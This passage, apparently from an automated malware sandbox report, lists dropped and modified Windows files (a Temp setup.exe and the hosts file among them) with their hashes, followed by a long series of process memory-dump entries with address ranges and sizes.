                                              ae034212c790f7181ea92426a5dcc08cafd0b711

                                              SHA256

                                              d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                              SHA512

                                              8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                            • C:\Windows\Temp\setup.exe
                                              Filesize

                                              7.1MB

                                              MD5

                                              e85216c5e3420493ea698778ccf16073

                                              SHA1

                                              ae034212c790f7181ea92426a5dcc08cafd0b711

                                              SHA256

                                              d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                              SHA512

                                              8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
                                              Filesize

                                              539B

                                              MD5

                                              84f2160705ac9a032c002f966498ef74

                                              SHA1

                                              e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                              SHA256

                                              7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                              SHA512

                                              f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                            • C:\Windows\system32\drivers\etc\hosts
                                              Filesize

                                              1KB

                                              MD5

                                              f3f6968a4c0f457f427eb17f7cc5f68b

                                              SHA1

                                              872933578f4b7d555158189ed02015f192daa7c6

                                              SHA256

                                              774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                              SHA512

                                              5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                            • memory/508-540-0x0000000000000000-mapping.dmp
                                            • memory/1796-186-0x0000000000000000-mapping.dmp
                                            • memory/1836-350-0x0000000000000000-mapping.dmp
                                            • memory/1852-280-0x0000000000400000-0x000000000106A000-memory.dmp
                                              Filesize

                                              12.4MB

                                            • memory/1852-278-0x0000000000400000-0x000000000106A000-memory.dmp
                                              Filesize

                                              12.4MB

                                            • memory/1852-248-0x00007FFF00550000-0x00007FFF0072B000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/1852-279-0x00007FFF00550000-0x00007FFF0072B000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/1852-282-0x00007FFF00550000-0x00007FFF0072B000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/1852-198-0x0000000000400000-0x000000000106A000-memory.dmp
                                              Filesize

                                              12.4MB

                                            • memory/1852-183-0x0000000000000000-mapping.dmp
                                            • memory/1952-356-0x0000000000000000-mapping.dmp
                                            • memory/2752-537-0x0000000000000000-mapping.dmp
                                            • memory/3068-144-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-176-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-141-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-142-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-120-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-145-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-146-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-147-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-148-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-150-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-151-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-149-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-143-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-152-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-153-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-155-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-156-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-157-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-154-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-159-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-158-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-162-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-161-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-160-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-163-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-164-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-167-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-169-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-170-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-168-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-166-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-165-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-171-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-172-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-173-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-174-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-175-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-140-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-177-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-178-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-180-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-181-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-139-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-138-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-137-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-182-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-179-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-136-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-121-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-135-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-134-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-131-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-133-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-132-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-130-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-129-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-128-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-122-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-123-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-127-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-119-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-124-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-125-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3068-126-0x0000000076FF0000-0x000000007717E000-memory.dmp
                                              Filesize

                                              1.6MB

                                            • memory/3152-187-0x0000000000000000-mapping.dmp
                                            • memory/3992-444-0x000001615CE70000-0x000001615CE7A000-memory.dmp
                                              Filesize

                                              40KB

                                            • memory/3992-411-0x000001615D350000-0x000001615D409000-memory.dmp
                                              Filesize

                                              740KB

                                            • memory/3992-405-0x000001615CE50000-0x000001615CE6C000-memory.dmp
                                              Filesize

                                              112KB

                                            • memory/3992-387-0x0000000000000000-mapping.dmp
                                            • memory/4188-536-0x0000000000000000-mapping.dmp
                                            • memory/4212-302-0x0000019D4BB90000-0x0000019D4BFAC000-memory.dmp
                                              Filesize

                                              4.1MB

                                            • memory/4212-286-0x0000019D66B70000-0x0000019D66F8C000-memory.dmp
                                              Filesize

                                              4.1MB

                                            • memory/4240-349-0x0000000000000000-mapping.dmp
                                            • memory/4244-577-0x000001AA9DCD0000-0x000001AA9DCD7000-memory.dmp
                                              Filesize

                                              28KB

                                            • memory/4244-584-0x000001AA9DEA0000-0x000001AA9DEA6000-memory.dmp
                                              Filesize

                                              24KB

                                            • memory/4256-566-0x0000000000000000-mapping.dmp
                                            • memory/4284-372-0x0000000000400000-0x000000000106A000-memory.dmp
                                              Filesize

                                              12.4MB

                                            • memory/4284-375-0x00007FFF00550000-0x00007FFF0072B000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/4284-374-0x0000000000400000-0x000000000106A000-memory.dmp
                                              Filesize

                                              12.4MB

                                            • memory/4284-373-0x00007FFF00550000-0x00007FFF0072B000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/4284-371-0x00007FFF00550000-0x00007FFF0072B000-memory.dmp
                                              Filesize

                                              1.9MB

                                            • memory/4284-369-0x0000000000400000-0x000000000106A000-memory.dmp
                                              Filesize

                                              12.4MB

                                            • memory/4296-565-0x0000000000000000-mapping.dmp
                                            • memory/4304-567-0x0000000000000000-mapping.dmp
                                            • memory/4308-351-0x0000000000000000-mapping.dmp
                                            • memory/4324-293-0x0000000000000000-mapping.dmp
                                            • memory/4340-539-0x0000000000000000-mapping.dmp
                                            • memory/4356-561-0x0000000000000000-mapping.dmp
                                            • memory/4368-300-0x0000018277DE0000-0x0000018277E02000-memory.dmp
                                              Filesize

                                              136KB

                                            • memory/4368-305-0x0000018278B40000-0x0000018278BB6000-memory.dmp
                                              Filesize

                                              472KB

                                            • memory/4368-294-0x0000000000000000-mapping.dmp
                                            • memory/4372-576-0x0000000140000000-0x0000000140803000-memory.dmp
                                              Filesize

                                              8.0MB

                                            • memory/4372-575-0x0000000140000000-0x0000000140803000-memory.dmp
                                              Filesize

                                              8.0MB

                                            • memory/4376-353-0x0000000000000000-mapping.dmp
                                            • memory/4380-557-0x0000000000000000-mapping.dmp
                                            • memory/4396-352-0x0000000000000000-mapping.dmp
                                            • memory/4420-552-0x0000000000000000-mapping.dmp
                                            • memory/4432-363-0x0000000000000000-mapping.dmp
                                            • memory/4436-362-0x0000000000000000-mapping.dmp
                                            • memory/4448-543-0x0000000000000000-mapping.dmp
                                            • memory/4472-354-0x0000000000000000-mapping.dmp
                                            • memory/4496-355-0x0000000000000000-mapping.dmp
                                            • memory/4508-563-0x0000000000400000-0x000000000040C000-memory.dmp
                                              Filesize

                                              48KB

                                            • memory/4508-578-0x0000000000400000-0x000000000040C000-memory.dmp
                                              Filesize

                                              48KB

                                            • memory/4508-546-0x0000000000401BEA-mapping.dmp
                                            • memory/4516-544-0x0000000000000000-mapping.dmp
                                            • memory/4524-559-0x0000000000000000-mapping.dmp
                                            • memory/4544-357-0x0000000000000000-mapping.dmp
                                            • memory/4556-556-0x0000000000000000-mapping.dmp
                                            • memory/4564-554-0x0000000000000000-mapping.dmp
                                            • memory/4564-358-0x0000000000000000-mapping.dmp
                                            • memory/4584-359-0x0000000000000000-mapping.dmp
                                            • memory/4588-553-0x0000000000000000-mapping.dmp
                                            • memory/4604-360-0x0000000000000000-mapping.dmp
                                            • memory/4608-364-0x0000000000000000-mapping.dmp
                                            • memory/4664-551-0x0000000000000000-mapping.dmp
                                            • memory/4672-564-0x0000000000000000-mapping.dmp
                                            • memory/4676-558-0x0000000000000000-mapping.dmp
                                            • memory/4676-361-0x0000000000000000-mapping.dmp
                                            • memory/4688-333-0x0000000000000000-mapping.dmp
                                            • memory/4696-569-0x0000000000000000-mapping.dmp
                                            • memory/4704-366-0x0000000000000000-mapping.dmp
                                            • memory/4720-334-0x0000000000000000-mapping.dmp
                                            • memory/4744-568-0x0000000000000000-mapping.dmp
                                            • memory/4760-560-0x0000000000000000-mapping.dmp
                                            • memory/4788-335-0x0000000000000000-mapping.dmp
                                            • memory/4800-336-0x0000000000000000-mapping.dmp
                                            • memory/4828-337-0x0000000000000000-mapping.dmp
                                            • memory/4844-338-0x0000000000000000-mapping.dmp
                                            • memory/4856-339-0x0000000000000000-mapping.dmp
                                            • memory/4924-340-0x0000000000000000-mapping.dmp
                                            • memory/4944-341-0x0000000000000000-mapping.dmp
                                            • memory/4960-342-0x0000000000000000-mapping.dmp
                                            • memory/4988-343-0x0000000000000000-mapping.dmp
                                            • memory/4992-555-0x000002249D4F0000-0x000002249D502000-memory.dmp
                                              Filesize

                                              72KB

                                            • memory/4992-542-0x0000022484A50000-0x0000022484A56000-memory.dmp
                                              Filesize

                                              24KB

                                            • memory/5008-344-0x0000000000000000-mapping.dmp
                                            • memory/5036-345-0x0000000000000000-mapping.dmp
                                            • memory/5048-346-0x0000000000000000-mapping.dmp
                                            • memory/5052-386-0x0000000000000000-mapping.dmp
                                            • memory/5072-541-0x0000000000000000-mapping.dmp
                                            • memory/5084-347-0x0000000000000000-mapping.dmp
                                            • memory/5116-348-0x0000000000000000-mapping.dmp